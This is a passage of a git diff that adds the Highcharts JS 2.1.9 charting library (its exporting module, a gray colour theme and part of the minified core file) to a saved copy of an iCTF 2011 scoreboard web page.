+/* + Highcharts JS v2.1.9 (2011-11-11) + Exporting module + + (c) 2010-2011 Torstein H?nsi + + License: www.highcharts.com/license +*/ +(function(){var n=Highcharts,A=n.Chart,B=n.addEvent,E=n.removeEvent,t=n.createElement,w=n.discardElement,u=n.css,x=n.merge,q=n.each,r=n.extend,F=Math.max,s=document,G=window,C=s.documentElement.ontouchstart!==undefined,y=n.getOptions();r(y.lang,{downloadPNG:"Download PNG image",downloadJPEG:"Download JPEG image",downloadPDF:"Download PDF document",downloadSVG:"Download SVG vector image",exportButtonTitle:"Export to raster or vector image",printButtonTitle:"Print the chart"});y.navigation={menuStyle:{border:"1px solid #A0A0A0", +background:"#FFFFFF"},menuItemStyle:{padding:"0 5px",background:"none",color:"#303030",fontSize:C?"14px":"11px"},menuItemHoverStyle:{background:"#4572A5",color:"#FFFFFF"},buttonOptions:{align:"right",backgroundColor:{linearGradient:[0,0,0,20],stops:[[0.4,"#F7F7F7"],[0.6,"#E3E3E3"]]},borderColor:"#B0B0B0",borderRadius:3,borderWidth:1,height:20,hoverBorderColor:"#909090",hoverSymbolFill:"#81A7CF",hoverSymbolStroke:"#4572A5",symbolFill:"#E0E0E0",symbolStroke:"#A0A0A0",symbolX:11.5,symbolY:10.5,verticalAlign:"top", +width:24,y:10}};y.exporting={type:"image/png",url:"http://export.highcharts.com/",width:800,enableImages:false,buttons:{exportButton:{symbol:"exportIcon",x:-10,symbolFill:"#A8BF77",hoverSymbolFill:"#768F3E",_id:"exportButton",_titleKey:"exportButtonTitle",menuItems:[{textKey:"downloadPNG",onclick:function(){this.exportChart()}},{textKey:"downloadJPEG",onclick:function(){this.exportChart({type:"image/jpeg"})}},{textKey:"downloadPDF",onclick:function(){this.exportChart({type:"application/pdf"})}},{textKey:"downloadSVG", +onclick:function(){this.exportChart({type:"image/svg+xml"})}}]},printButton:{symbol:"printIcon",x:-36,symbolFill:"#B5C9DF",hoverSymbolFill:"#779ABF",_id:"printButton",_titleKey:"printButtonTitle",onclick:function(){this.print()}}}};r(A.prototype,{getSVG:function(b){var c=this,a,f,d,k,e,j,h=x(c.options,b);if(!s.createElementNS)s.createElementNS=function(i,g){var o=s.createElement(g);o.getBBox=function(){return n.Renderer.prototype.Element.prototype.getBBox.apply({element:o})};return o};b=t("div",null, +{position:"absolute",top:"-9999em",width:c.chartWidth+"px",height:c.chartHeight+"px"},s.body);r(h.chart,{renderTo:b,forExport:true});h.exporting.enabled=false;if(!h.exporting.enableImages)h.chart.plotBackgroundImage=null;h.series=[];q(c.series,function(i){d=i.options;d.animation=false;d.showCheckbox=false;d.visible=i.visible;if(!h.exporting.enableImages)if(d&&d.marker&&/^url\(/.test(d.marker.symbol))d.marker.symbol="circle";d.data=[];q(i.data,function(g){k=g.config;e={x:g.x,y:g.y,name:g.name};typeof k=== +"object"&&g.config&&k.constructor!==Array&&r(e,k);e.visible=g.visible;d.data.push(e);if(!h.exporting.enableImages)(j=g.config&&g.config.marker)&&/^url\(/.test(j.symbol)&&delete j.symbol});h.series.push(d)});a=new Highcharts.Chart(h);q(["xAxis","yAxis"],function(i){q(c[i],function(g,o){var l=a[i][o],m=g.getExtremes(),p=m.userMin;m=m.userMax;if(p!==void 0||m!==void 0)l.setExtremes(p,m,true,false)})});f=a.container.innerHTML;h=null;a.destroy();w(b);f=f.replace(/zIndex="[^"]+"/g,"").replace(/isShadow="[^"]+"/g, +"").replace(/symbolName="[^"]+"/g,"").replace(/jQuery[0-9]+="[^"]+"/g,"").replace(/isTracker="[^"]+"/g,"").replace(/url\([^#]+#/g,"url(#").replace(/<svg /,'<svg xmlns:xlink="http://www.w3.org/1999/xlink" ').replace(/ href=/g," xlink:href=").replace(/ /g,"\u00a0").replace(/­/g,"\u00ad").replace(/id=([^" >]+)/g,'id="$1"').replace(/class=([^" ]+)/g,'class="$1"').replace(/ transform /g," ").replace(/:(path|rect)/g,"$1").replace(/<img ([^>]*)>/gi,"<image $1 />").replace(/<\/image>/g,"").replace(/<image ([^>]*)([^\/])>/gi, +"<image $1$2 />").replace(/width=(\d+)/g,'width="$1"').replace(/height=(\d+)/g,'height="$1"').replace(/hc-svg-href="/g,'xlink:href="').replace(/style="([^"]+)"/g,function(i){return i.toLowerCase()});f=f.replace(/(url\(#highcharts-[0-9]+)"/g,"$1").replace(/"/g,"'");if(f.match(/ xmlns="/g).length===2)f=f.replace(/xmlns="[^"]+"/,"");return f},exportChart:function(b,c){var a,f=this.getSVG(c);b=x(this.options.exporting,b);a=t("form",{method:"post",action:b.url},{display:"none"},s.body);q(["filename", +"type","width","svg"],function(d){t("input",{type:"hidden",name:d,value:{filename:b.filename||"chart",type:b.type,width:b.width,svg:f}[d]},null,a)});a.submit();w(a)},print:function(){var b=this,c=b.container,a=[],f=c.parentNode,d=s.body,k=d.childNodes;if(!b.isPrinting){b.isPrinting=true;q(k,function(e,j){if(e.nodeType===1){a[j]=e.style.display;e.style.display="none"}});d.appendChild(c);G.print();setTimeout(function(){f.appendChild(c);q(k,function(e,j){if(e.nodeType===1)e.style.display=a[j]});b.isPrinting= +false},1E3)}},contextMenu:function(b,c,a,f,d,k){var e=this,j=e.options.navigation,h=j.menuItemStyle,i=e.chartWidth,g=e.chartHeight,o="cache-"+b,l=e[o],m=F(d,k),p,z;if(!l){e[o]=l=t("div",{className:"highcharts-"+b},{position:"absolute",zIndex:1E3,padding:m+"px"},e.container);p=t("div",null,r({MozBoxShadow:"3px 3px 10px #888",WebkitBoxShadow:"3px 3px 10px #888",boxShadow:"3px 3px 10px #888"},j.menuStyle),l);z=function(){u(l,{display:"none"})};B(l,"mouseleave",z);q(c,function(v){if(v){var D=t("div", +{onmouseover:function(){u(this,j.menuItemHoverStyle)},onmouseout:function(){u(this,h)},innerHTML:v.text||e.options.lang[v.textKey]},r({cursor:"pointer"},h),p);D[C?"ontouchstart":"onclick"]=function(){z();v.onclick.apply(e,arguments)};e.exportDivElements.push(D)}});e.exportDivElements.push(p,l);e.exportMenuWidth=l.offsetWidth;e.exportMenuHeight=l.offsetHeight}b={display:"block"};if(a+e.exportMenuWidth>i)b.right=i-a-d-m+"px";else b.left=a-m+"px";if(f+k+e.exportMenuHeight>g)b.bottom=g-f-m+"px";else b.top= +f+k-m+"px";u(l,b)},addButton:function(b){function c(){g.attr(m);i.attr(l)}var a=this,f=a.renderer,d=x(a.options.navigation.buttonOptions,b),k=d.onclick,e=d.menuItems,j=d.width,h=d.height,i,g,o;b=d.borderWidth;var l={stroke:d.borderColor},m={stroke:d.symbolStroke,fill:d.symbolFill};if(!a.exportDivElements){a.exportDivElements=[];a.exportSVGElements=[]}if(d.enabled!==false){i=f.rect(0,0,j,h,d.borderRadius,b).align(d,true).attr(r({fill:d.backgroundColor,"stroke-width":b,zIndex:19},l)).add();o=f.rect(0, +0,j,h,0).align(d).attr({id:d._id,fill:"rgba(255, 255, 255, 0.001)",title:a.options.lang[d._titleKey],zIndex:21}).css({cursor:"pointer"}).on("mouseover",function(){g.attr({stroke:d.hoverSymbolStroke,fill:d.hoverSymbolFill});i.attr({stroke:d.hoverBorderColor})}).on("mouseout",c).on("click",c).add();if(e)k=function(){c();var p=o.getBBox();a.contextMenu("export-menu",e,p.x,p.y,j,h)};o.on("click",function(){k.apply(a,arguments)});g=f.symbol(d.symbol,d.symbolX,d.symbolY,(d.symbolSize||12)/2).align(d,true).attr(r(m, +{"stroke-width":d.symbolStrokeWidth||1,zIndex:20})).add();a.exportSVGElements.push(i,o,g)}},destroyExport:function(){var b,c;for(b=0;b<this.exportSVGElements.length;b++){c=this.exportSVGElements[b];c.onclick=c.ontouchstart=null;this.exportSVGElements[b]=c.destroy()}for(b=0;b<this.exportDivElements.length;b++){c=this.exportDivElements[b];E(c,"mouseleave");this.exportDivElements[b]=c.onmouseout=c.onmouseover=c.ontouchstart=c.onclick=null;w(c)}}});n.Renderer.prototype.symbols.exportIcon=function(b,c, +a){return["M",b-a,c+a,"L",b+a,c+a,b+a,c+a*0.5,b-a,c+a*0.5,"Z","M",b,c+a*0.5,"L",b-a*0.5,c-a/3,b-a/6,c-a/3,b-a/6,c-a,b+a/6,c-a,b+a/6,c-a/3,b+a*0.5,c-a/3,"Z"]};n.Renderer.prototype.symbols.printIcon=function(b,c,a){return["M",b-a,c+a*0.5,"L",b+a,c+a*0.5,b+a,c-a/3,b-a,c-a/3,"Z","M",b-a*0.5,c-a/3,"L",b-a*0.5,c-a,b+a*0.5,c-a,b+a*0.5,c-a/3,"Z","M",b-a*0.5,c+a*0.5,"L",b-a*0.75,c+a,b+a*0.75,c+a,b+a*0.5,c+a*0.5,"Z"]};A.prototype.callbacks.push(function(b){var c,a=b.options.exporting,f=a.buttons;if(a.enabled!== +false){for(c in f)b.addButton(f[c]);B(b,"destroy",b.destroyExport)}})})(); diff --git a/ictf2011/scoreboard.ictf2011.info_files/fr.png b/ictf2011/scoreboard.ictf2011.info_files/fr.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/gb.png b/ictf2011/scoreboard.ictf2011.info_files/gb.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/gray.js b/ictf2011/scoreboard.ictf2011.info_files/gray.js @@ -0,0 +1,262 @@ +/** + * Gray theme for Highcharts JS + * @author Torstein Hønsi + */ + +Highcharts.theme = { + colors: ["#DDDF0D", "#7798BF", "#55BF3B", "#DF5353", "#aaeeee", "#ff0066", "#eeaaee", + "#55BF3B", "#DF5353", "#7798BF", "#aaeeee"], + chart: { + backgroundColor: { + linearGradient: [0, 0, 0, 400], + stops: [ + [0, 'rgb(62,84,130)'], + [1, 'rgb(16, 16, 20)'] + ] + }, + borderWidth: 0, + borderRadius: 15, + plotBackgroundColor: null, + plotShadow: false, + plotBorderWidth: 0 + }, + title: { + style: { + color: '#FFF', + font: '16px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + }, + subtitle: { + style: { + color: '#DDD', + font: '12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + }, + xAxis: { + gridLineWidth: 0, + lineColor: '#999', + tickColor: '#999', + labels: { + style: { + color: '#999', + fontWeight: 'bold' + } + }, + title: { + style: { + color: '#AAA', + font: 'bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + } + }, + yAxis: { + alternateGridColor: null, + minorTickInterval: null, + gridLineColor: 'rgba(255, 255, 255, .1)', + lineWidth: 0, + tickWidth: 0, + labels: { + style: { + color: '#999', + fontWeight: 'bold' + } + }, + title: { + style: { + color: '#AAA', + font: 'bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif' + } + } + }, + legend: { + itemStyle: { + color: '#CCC' + }, + itemHoverStyle: { + color: '#FFF' + }, + itemHiddenStyle: { + color: '#333' + } + }, + labels: { + style: { + color: '#CCC' + } + }, + tooltip: { + backgroundColor: { + linearGradient: [0, 0, 0, 50], + stops: [ + [0, 'rgba(96, 96, 96, .8)'], + [1, 'rgba(16, 16, 16, .8)'] + ] + }, + borderWidth: 0, + style: { + color: '#FFF' + } + }, + + + plotOptions: { + line: { + dataLabels: { + color: '#CCC' + }, + marker: { + lineColor: '#333' + } + }, + spline: { + marker: { + lineColor: '#333' + } + }, + scatter: { + marker: { + lineColor: '#333' + } + }, + candlestick: { + lineColor: 'white' + } + }, + + toolbar: { + itemStyle: { + color: '#CCC' + } + }, + + navigation: { + buttonOptions: { + backgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#606060'], + [0.6, '#333333'] + ] + }, + borderColor: '#000000', + symbolStroke: '#C0C0C0', + hoverSymbolStroke: '#FFFFFF' + } + }, + + exporting: { + buttons: { + exportButton: { + symbolFill: '#55BE3B' + }, + printButton: { + symbolFill: '#7797BE' + } + } + }, + + // scroll charts + rangeSelector: { + buttonTheme: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + stroke: '#000000', + style: { + color: '#CCC', + fontWeight: 'bold' + }, + states: { + hover: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#BBB'], + [0.6, '#888'] + ] + }, + stroke: '#000000', + style: { + color: 'white' + } + }, + select: { + fill: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.1, '#000'], + [0.3, '#333'] + ] + }, + stroke: '#000000', + style: { + color: 'yellow' + } + } + } + }, + inputStyle: { + backgroundColor: '#333', + color: 'silver' + }, + labelStyle: { + color: 'silver' + } + }, + + navigator: { + handles: { + backgroundColor: '#666', + borderColor: '#AAA' + }, + outlineColor: '#CCC', + maskFill: 'rgba(16, 16, 16, 0.5)', + series: { + color: '#7798BF', + lineColor: '#A6C7ED' + } + }, + + scrollbar: { + barBackgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + barBorderColor: '#CCC', + buttonArrowColor: '#CCC', + buttonBackgroundColor: { + linearGradient: [0, 0, 0, 20], + stops: [ + [0.4, '#888'], + [0.6, '#555'] + ] + }, + buttonBorderColor: '#CCC', + rifleColor: '#FFF', + trackBackgroundColor: { + linearGradient: [0, 0, 0, 10], + stops: [ + [0, '#000'], + [1, '#333'] + ] + }, + trackBorderColor: '#666' + }, + + // special colors for some of the demo examples + legendBackgroundColor: 'rgba(48, 48, 48, 0.8)', + legendBackgroundColorSolid: 'rgb(70, 70, 70)', + dataLabelsColor: '#444', + textColor: '#E0E0E0', + maskColor: 'rgba(255,255,255,0.3)' +}; + +// Apply the theme +var highchartsOptions = Highcharts.setOptions(Highcharts.theme); diff --git a/ictf2011/scoreboard.ictf2011.info_files/highcharts.js b/ictf2011/scoreboard.ictf2011.info_files/highcharts.js @@ -0,0 +1,176 @@ +/* + Highcharts JS v2.1.9 (2011-11-11) + + (c) 2009-2011 Torstein H?nsi + + License: www.highcharts.com/license +*/ +(function(){function sa(a,b){var c;a||(a={});for(c in b)a[c]=b[c];return a}function ja(a,b){return parseInt(a,b||10)}function Sb(a){return typeof a==="string"}function Nb(a){return typeof a==="object"}function lc(a){return typeof a==="number"}function mc(a){return Fa.log(a)/Fa.LN10}function nc(a,b){for(var c=a.length;c--;)if(a[c]===b){a.splice(c,1);break}}function K(a){return a!==Wa&&a!==null}function Ga(a,b,c){var d,e;if(Sb(b))if(K(c))a.setAttribute(b,c);else{if(a&&a.getAttribute)e=a.getAttribute(b)}else if(K(b)&& +Nb(b))for(d in b)a.setAttribute(d,b[d]);return e}function zc(a){return Object.prototype.toString.call(a)==="[object Array]"?a:[a]}function A(){var a=arguments,b,c,d=a.length;for(b=0;b<d;b++){c=a[b];if(typeof c!=="undefined"&&c!==null)return c}}function Ja(a,b){if(Pc)if(b&&b.opacity!==Wa)b.filter="alpha(opacity="+b.opacity*100+")";sa(a.style,b)}function hb(a,b,c,d,e){a=ua.createElement(a);b&&sa(a,b);e&&Ja(a,{padding:0,border:jb,margin:0});c&&Ja(a,c);d&&d.appendChild(a);return a}function yb(a,b){var c= +function(){};c.prototype=new a;sa(c.prototype,b);return c}function Ed(a,b,c,d){var e=Xa.lang;a=a;var f=isNaN(b=bb(b))?2:b;b=c===undefined?e.decimalPoint:c;d=d===undefined?e.thousandsSep:d;e=a<0?"-":"";c=String(ja(a=bb(+a||0).toFixed(f)));var g=c.length>3?c.length%3:0;return e+(g?c.substr(0,g)+d:"")+c.substr(g).replace(/(\d{3})(?=\d)/g,"$1"+d)+(f?b+bb(a-c).toFixed(f).slice(2):"")}function Fd(a){var b={left:a.offsetLeft,top:a.offsetTop};for(a=a.offsetParent;a;){b.left+=a.offsetLeft;b.top+=a.offsetTop; +if(a!==ua.body&&a!==ua.documentElement){b.left-=a.scrollLeft;b.top-=a.scrollTop}a=a.offsetParent}return b}function Gd(){this.symbol=this.color=0}function fe(a,b,c,d,e,f,g){var h=g.x;g=g.y;var i=h-a+c-25,j=g-b+d+10,m;if(i<7)i=c+h+15;if(i+a>c+e){i-=i+a-(c+e);j-=b;m=true}if(j<5){j=5;if(m&&g>=j&&g<=j+b)j=g+b-5}else if(j+b>d+f)j=d+f-b-5;return{x:i,y:j}}function Hd(a,b){var c=a.length,d;for(d=0;d<c;d++)a[d].ss_i=d;a.sort(function(e,f){var g=b(e,f);return g===0?e.ss_i-f.ss_i:g});for(d=0;d<c;d++)delete a[d].ss_i} +function Ac(a){for(var b in a){a[b]&&a[b].destroy&&a[b].destroy();delete a[b]}}function oc(a,b){Bc=A(a,b.animation)}function Id(){var a=Xa.global.useUTC;Qc=a?Date.UTC:function(b,c,d,e,f,g){return(new Date(b,c,A(d,1),A(e,0),A(f,0),A(g,0))).getTime()};id=a?"getUTCMinutes":"getMinutes";jd=a?"getUTCHours":"getHours";kd=a?"getUTCDay":"getDay";Cc=a?"getUTCDate":"getDate";Rc=a?"getUTCMonth":"getMonth";Sc=a?"getUTCFullYear":"getFullYear";Jd=a?"setUTCMinutes":"setMinutes";Kd=a?"setUTCHours":"setHours";ld= +a?"setUTCDate":"setDate";Ld=a?"setUTCMonth":"setMonth";Md=a?"setUTCFullYear":"setFullYear"}function pc(a){Tc||(Tc=hb(Tb));a&&Tc.appendChild(a);Tc.innerHTML=""}function Uc(){}function Nd(a,b){function c(p){function q(k,n){this.pos=k;this.minor=n;this.isNew=true;n||this.addLabel()}function w(k){if(k){this.options=k;this.id=k.id}return this}function x(k,n,t,r){this.isNegative=n;this.options=k;this.x=t;this.stack=r;this.alignOptions={align:k.align||(va?n?"left":"right":"center"),verticalAlign:k.verticalAlign|| +(va?"middle":n?"bottom":"top"),y:A(k.y,va?4:n?14:-6),x:A(k.x,va?n?-6:6:0)};this.textAlign=k.textAlign||(va?n?"right":"left":"center")}function V(){var k=[],n=[],t;pa=wa=null;zb=[];u(Ha,function(r){t=false;u(["xAxis","yAxis"],function(F){if(r.isCartesian&&(F==="xAxis"&&xa||F==="yAxis"&&!xa)&&(r.options[F]===o.index||r.options[F]===Wa&&o.index===0)){r[F]=I;zb.push(r);t=true}});if(!r.visible&&z.ignoreHiddenSeries)t=false;if(t){var J,E,Q,fa,ka,$;if(!xa){J=r.options.stacking;Vc=J==="percent";if(J){ka= +r.options.stack;fa=r.type+A(ka,"");$="-"+fa;r.stackKey=fa;E=k[fa]||[];k[fa]=E;Q=n[$]||[];n[$]=Q}if(Vc){pa=0;wa=99}}if(r.isCartesian){u(r.data,function(F){var O=F.x,S=F.y,aa=S<0,Eb=aa?Q:E,kb=aa?$:fa;if(pa===null)pa=wa=F[qa];if(xa)if(O>wa)wa=O;else{if(O<pa)pa=O}else if(K(S)){if(J)Eb[O]=K(Eb[O])?Eb[O]+S:S;S=Eb?Eb[O]:S;F=A(F.low,S);if(!Vc)if(S>wa)wa=S;else if(F<pa)pa=F;if(J){s[kb]||(s[kb]={});s[kb][O]||(s[kb][O]=new x(o.stackLabels,aa,O,ka));s[kb][O].setTotal(S)}}});if(/(area|column|bar)/.test(r.type)&& +!xa)if(pa>=0){pa=0;Od=true}else if(wa<0){wa=0;Pd=true}}}})}function N(k,n){var t,r;Fb=n?1:Fa.pow(10,lb(Fa.log(k)/Fa.LN10));t=k/Fb;if(!n){n=[1,2,2.5,5,10];if(o.allowDecimals===false||ca)if(Fb===1)n=[1,2,5,10];else if(Fb<=0.1)n=[1/Fb]}for(r=0;r<n.length;r++){k=n[r];if(t<=(n[r]+(n[r+1]||n[r]))/2)break}k*=Fb;return k}function ta(k){var n;n=k;Fb=A(Fb,Fa.pow(10,lb(Fa.log(Ta)/Fa.LN10)));if(Fb<1){n=W(1/Fb)*10;n=W(k*n)/n}return n}function da(){var k,n,t,r,J=o.tickInterval,E=o.tickPixelInterval;k=o.maxZoom|| +(xa&&!K(o.min)&&!K(o.max)?tb(l.smallestInterval*5,wa-pa):null);ya=R?Da:Aa;if(Ub){t=l[xa?"xAxis":"yAxis"][o.linkedTo];r=t.getExtremes();ia=A(r.min,r.dataMin);ra=A(r.max,r.dataMax)}else{ia=A(Vb,o.min,pa);ra=A(Gb,o.max,wa)}if(ca){ia=mc(ia);ra=mc(ra)}if(ra-ia<k){r=(k-ra+ia)/2;ia=Ia(ia-r,A(o.min,ia-r),pa);ra=tb(ia+k,A(o.max,ia+k),wa)}if(!Ya&&!Vc&&!Ub&&K(ia)&&K(ra)){k=ra-ia||1;if(!K(o.min)&&!K(Vb)&&Qd&&(pa<0||!Od))ia-=k*Qd;if(!K(o.max)&&!K(Gb)&&Rd&&(wa>0||!Pd))ra+=k*Rd}Ta=ia===ra?1:Ub&&!J&&E===t.options.tickPixelInterval? +t.tickInterval:A(J,Ya?1:(ra-ia)*E/ya);if(!D&&!K(o.tickInterval))Ta=N(Ta);I.tickInterval=Ta;Wc=o.minorTickInterval==="auto"&&Ta?Ta/5:o.minorTickInterval;if(D){Ba=[];J=Xa.global.useUTC;var Q=1E3/ub,fa=6E4/ub,ka=36E5/ub;E=864E5/ub;k=6048E5/ub;r=2592E6/ub;var $=31556952E3/ub,F=[["second",Q,[1,2,5,10,15,30]],["minute",fa,[1,2,5,10,15,30]],["hour",ka,[1,2,3,4,6,8,12]],["day",E,[1,2]],["week",k,[1,2]],["month",r,[1,2,3,4,6]],["year",$,null]],O=F[6],S=O[1],aa=O[2];for(t=0;t<F.length;t++){O=F[t];S=O[1];aa= +O[2];if(F[t+1])if(Ta<=(S*aa[aa.length-1]+F[t+1][1])/2)break}if(S===$&&Ta<5*S)aa=[1,2,5];F=N(Ta/S,aa);aa=new Date(ia*ub);aa.setMilliseconds(0);if(S>=Q)aa.setSeconds(S>=fa?0:F*lb(aa.getSeconds()/F));if(S>=fa)aa[Jd](S>=ka?0:F*lb(aa[id]()/F));if(S>=ka)aa[Kd](S>=E?0:F*lb(aa[jd]()/F));if(S>=E)aa[ld](S>=r?1:F*lb(aa[Cc]()/F));if(S>=r){aa[Ld](S>=$?0:F*lb(aa[Rc]()/F));n=aa[Sc]()}if(S>=$){n-=n%F;aa[Md](n)}S===k&&aa[ld](aa[Cc]()-aa[kd]()+o.startOfWeek);t=1;n=aa[Sc]();Q=aa.getTime()/ub;fa=aa[Rc]();for(ka=aa[Cc]();Q< +ra&&t<Da;){Ba.push(Q);if(S===$)Q=Qc(n+t*F,0)/ub;else if(S===r)Q=Qc(n,fa+t*F)/ub;else if(!J&&(S===E||S===k))Q=Qc(n,fa,ka+t*F*(S===E?1:7));else Q+=S*F;t++}Ba.push(Q);Xc=o.dateTimeLabelFormats[O[0]]}else{t=ta(lb(ia/Ta)*Ta);n=ta(md(ra/Ta)*Ta);Ba=[];for(t=ta(t);t<=n;){Ba.push(t);t=ta(t+Ta)}}if(!Ub){if(Ya||xa&&l.hasColumn){n=(Ya?1:Ta)*0.5;if(Ya||!K(A(o.min,Vb)))ia-=n;if(Ya||!K(A(o.max,Gb)))ra+=n}n=Ba[0];t=Ba[Ba.length-1];if(o.startOnTick)ia=n;else ia>n&&Ba.shift();if(o.endOnTick)ra=t;else ra<t&&Ba.pop(); +Ob||(Ob={x:0,y:0});if(!D&&Ba.length>Ob[qa])Ob[qa]=Ba.length}}function Ma(){var k,n;Dc=ia;Sd=ra;V();da();Hb=fb;fb=ya/(ra-ia||1);if(!xa)for(k in s)for(n in s[k])s[k][n].cum=s[k][n].total;if(!I.isDirty)I.isDirty=ia!==Dc||ra!==Sd}function za(k){k=(new w(k)).render();Pb.push(k);return k}function eb(){var k=o.title,n=o.stackLabels,t=o.alternateGridColor,r=o.lineWidth,J,E,Q=(J=l.hasRendered)&&K(Dc)&&!isNaN(Dc);E=zb.length&&K(ia)&&K(ra);ya=R?Da:Aa;fb=ya/(ra-ia||1);cc=R?X:vb;if(E||Ub){if(Wc&&!Ya)for(E=ia+ +(Ba[0]-ia)%Wc;E<=ra;E+=Wc){Wb[E]||(Wb[E]=new q(E,true));Q&&Wb[E].isNew&&Wb[E].render(null,true);Wb[E].isActive=true;Wb[E].render()}u(Ba,function($,F){if(!Ub||$>=ia&&$<=ra){Q&&mb[$].isNew&&mb[$].render(F,true);mb[$].isActive=true;mb[$].render(F)}});t&&u(Ba,function($,F){if(F%2===0&&$<ra){dc[$]||(dc[$]=new w);dc[$].options={from:$,to:Ba[F+1]!==Wa?Ba[F+1]:ra,color:t};dc[$].render();dc[$].isActive=true}});J||u((o.plotLines||[]).concat(o.plotBands||[]),function($){Pb.push((new w($)).render())})}u([mb, +Wb,dc],function($){for(var F in $)if($[F].isActive)$[F].isActive=false;else{$[F].destroy();delete $[F]}});if(r){J=X+(Oa?Da:0)+la;E=cb-vb-(Oa?Aa:0)+la;J=ga.crispLine([Za,R?X:J,R?E:ea,Ka,R?$a-Ib:J,R?E:cb-vb],r);if(La)La.animate({d:J});else La=ga.path(J).attr({stroke:o.lineColor,"stroke-width":r,zIndex:7}).add()}if(ba){J=R?X:ea;r=ja(k.style.fontSize||12);J={low:J+(R?0:ya),middle:J+ya/2,high:J+(R?ya:0)}[k.align];r=(R?ea+Aa:X)+(R?1:-1)*(Oa?-1:1)*nd+(L===2?r:0);ba[ba.isNew?"attr":"animate"]({x:R?J:r+(Oa? +Da:0)+la+(k.x||0),y:R?r-(Oa?Aa:0)+la:J+(k.y||0)});ba.isNew=false}if(n&&n.enabled){var fa,ka;n=I.stackTotalGroup;if(!n)I.stackTotalGroup=n=ga.g("stack-labels").attr({visibility:Ab,zIndex:6}).translate(X,ea).add();for(fa in s){k=s[fa];for(ka in k)k[ka].render(n)}}I.isDirty=false}function ab(k){for(var n=Pb.length;n--;)Pb[n].id===k&&Pb[n].destroy()}var xa=p.isX,Oa=p.opposite,R=va?!xa:xa,L=R?Oa?0:2:Oa?1:3,s={},o=Ca(xa?Yc:od,[ge,he,Td,ie][L],p),I=this,ba,B=o.type,D=B==="datetime",ca=B==="logarithmic", +la=o.offset||0,qa=xa?"x":"y",ya,fb,Hb,cc=R?X:vb,G,ha,na,Ra,La,pa,wa,zb,Vb,Gb,ra=null,ia=null,Dc,Sd,Qd=o.minPadding,Rd=o.maxPadding,Ub=K(o.linkedTo),Od,Pd,Vc;B=o.events;var pd,Pb=[],Ta,Wc,Fb,Ba,mb={},Wb={},dc={},qc,rc,nd,Xc,Ya=o.categories,je=o.labels.formatter||function(){var k=this.value;return Xc?Zc(Xc,k):Ta%1E6===0?k/1E6+"M":Ta%1E3===0?k/1E3+"k":!Ya&&k>=1E3?Ed(k,0):k},$c=R&&o.labels.staggerLines,ec=o.reversed,fc=Ya&&o.tickmarkPlacement==="between"?0.5:0;q.prototype={addLabel:function(){var k=this.pos, +n=o.labels,t=!(k===ia&&!A(o.showFirstLabel,1)||k===ra&&!A(o.showLastLabel,0)),r=Ya&&R&&Ya.length&&!n.step&&!n.staggerLines&&!n.rotation&&Da/Ya.length||!R&&Da/2,J=Ya&&K(Ya[k])?Ya[k]:k,E=this.label;k=je.call({isFirst:k===Ba[0],isLast:k===Ba[Ba.length-1],dateTimeLabelFormat:Xc,value:ca?Fa.pow(10,J):J});r=r&&{width:Ia(1,W(r-2*(n.padding||10)))+Ua};r=sa(r,n.style);if(E===Wa)this.label=K(k)&&t&&n.enabled?ga.text(k,0,0,n.useHTML).attr({align:n.align,rotation:n.rotation}).css(r).add(na):null;else E&&E.attr({text:k}).css(r)}, +getLabelSize:function(){var k=this.label;return k?(this.labelBBox=k.getBBox())[R?"height":"width"]:0},render:function(k,n){var t=!this.minor,r=this.label,J=this.pos,E=o.labels,Q=this.gridLine,fa=t?o.gridLineWidth:o.minorGridLineWidth,ka=t?o.gridLineColor:o.minorGridLineColor,$=t?o.gridLineDashStyle:o.minorGridLineDashStyle,F=this.mark,O=t?o.tickLength:o.minorTickLength,S=t?o.tickWidth:o.minorTickWidth||0,aa=t?o.tickColor:o.minorTickColor,Eb=t?o.tickPosition:o.minorTickPosition,kb=E.step,nb=n&&ad|| +cb,Qb;Qb=R?G(J+fc,null,null,n)+cc:X+la+(Oa?(n&&qd||$a)-Ib-X:0);nb=R?nb-vb+la-(Oa?Aa:0):nb-G(J+fc,null,null,n)-cc;if(fa){J=ha(J+fc,fa,n);if(Q===Wa){Q={stroke:ka,"stroke-width":fa};if($)Q.dashstyle=$;if(t)Q.zIndex=1;this.gridLine=Q=fa?ga.path(J).attr(Q).add(Ra):null}!n&&Q&&J&&Q.animate({d:J})}if(S){if(Eb==="inside")O=-O;if(Oa)O=-O;t=ga.crispLine([Za,Qb,nb,Ka,Qb+(R?0:-O),nb+(R?O:0)],S);if(F)F.animate({d:t});else this.mark=ga.path(t).attr({stroke:aa,"stroke-width":S}).add(na)}if(r&&!isNaN(Qb)){Qb=Qb+ +E.x-(fc&&R?fc*fb*(ec?-1:1):0);nb=nb+E.y-(fc&&!R?fc*fb*(ec?1:-1):0);K(E.y)||(nb+=ja(r.styles.lineHeight)*0.9-r.getBBox().height/2);if($c)nb+=k/(kb||1)%$c*16;if(kb)r[k%kb?"hide":"show"]();r[this.isNew?"attr":"animate"]({x:Qb,y:nb})}this.isNew=false},destroy:function(){Ac(this)}};w.prototype={render:function(){var k=this,n=k.options,t=n.label,r=k.label,J=n.width,E=n.to,Q=n.from,fa=n.value,ka,$=n.dashStyle,F=k.svgElem,O=[],S,aa,Eb=n.color;aa=n.zIndex;var kb=n.events;if(ca){Q=mc(Q);E=mc(E);fa=mc(fa)}if(J){O= +ha(fa,J);n={stroke:Eb,"stroke-width":J};if($)n.dashstyle=$}else if(K(Q)&&K(E)){Q=Ia(Q,ia);E=tb(E,ra);ka=ha(E);if((O=ha(Q))&&ka)O.push(ka[4],ka[5],ka[1],ka[2]);else O=null;n={fill:Eb}}else 